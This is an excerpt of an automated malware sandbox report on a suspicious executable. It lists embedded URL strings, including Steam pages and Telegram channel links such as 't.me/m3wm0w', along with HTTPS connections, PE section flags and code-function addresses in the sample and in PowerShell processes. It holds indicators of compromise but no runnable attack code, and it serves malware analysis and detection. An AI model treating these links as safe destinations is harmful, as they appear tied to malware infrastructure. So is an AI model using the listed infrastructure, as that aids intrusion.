Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://store.steampowered.com/legal/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://store.steampowered.com/mobile
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://store.steampowered.com/news/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://store.steampowered.com/points/shop/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://store.steampowered.com/stats/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.00000000009CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/_~
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000000.1785190377.000000000045C000.00000008.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe.0.drString found in binary or memory: https://t.me/m3wm0w
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1812013102.0000000000A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/m3wm0w3
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/m3wm0w7
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/m3wm0wT
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/m3wm0wc
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe.0.drString found in binary or memory: https://t.me/m3wm0wp1up1Mozilla/5.0
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.00000000009CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/y~
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telegram.org/img/t_logo_2x.png
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49711 version: TLS 1.2

System Summary

barindex
PE file has a writeable .text section
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_00401625 NtQueryInformationProcess,NtQueryInformationProcess,14_2_00401625
Source: C:\Users\user\Desktop\YYjRtxS70h.exeCode function: 0_2_02830A400_2_02830A40
Source: C:\Users\user\Desktop\YYjRtxS70h.exeCode function: 0_2_028323090_2_02832309
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04E7B4A05_2_04E7B4A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04E7B4905_2_04E7B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_02C817627_2_02C81762
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_02C8096D7_2_02C8096D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04BEB49010_2_04BEB490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04BE167D10_2_04BE167D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04BE104410_2_04BE1044
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_08CC3E9810_2_08CC3E98
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_0440185511_2_04401855
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_044015E511_2_044015E5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_0440167011_2_04401670
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_0440136411_2_04401364
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_04B6B4A013_2_04B6B4A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_04B6B49013_2_04B6B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_08B83A9813_2_08B83A98
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0043E89314_2_0043E893
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040C09114_2_0040C091
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040E0A114_2_0040E0A1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0043014114_2_00430141
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040E16114_2_0040E161
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0044010114_2_00440101
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0042C11114_2_0042C111
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040C12114_2_0040C121
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040C1C114_2_0040C1C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_004401C114_2_004401C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_004121E114_2_004121E1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040A18114_2_0040A181
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0043025114_2_00430251
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040C26114_2_0040C261
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040A22114_2_0040A221
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0042C22114_2_0042C221
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040E23114_2_0040E231
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_004122A114_2_004122A1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0041235114_2_00412351
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040E30114_2_0040E301
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0043031114_2_00430311
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0044031114_2_00440311
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0042C32114_2_0042C321
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040A33114_2_0040A331
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_004103C114_2_004103C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0042C3C114_2_0042C3C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_004123F114_2_004123F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040E3F114_2_0040E3F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040C38114_2_0040C381
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040A41114_2_0040A411
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040C42114_2_0040C421
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_004104D114_2_004104D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_004404D114_2_004404D1
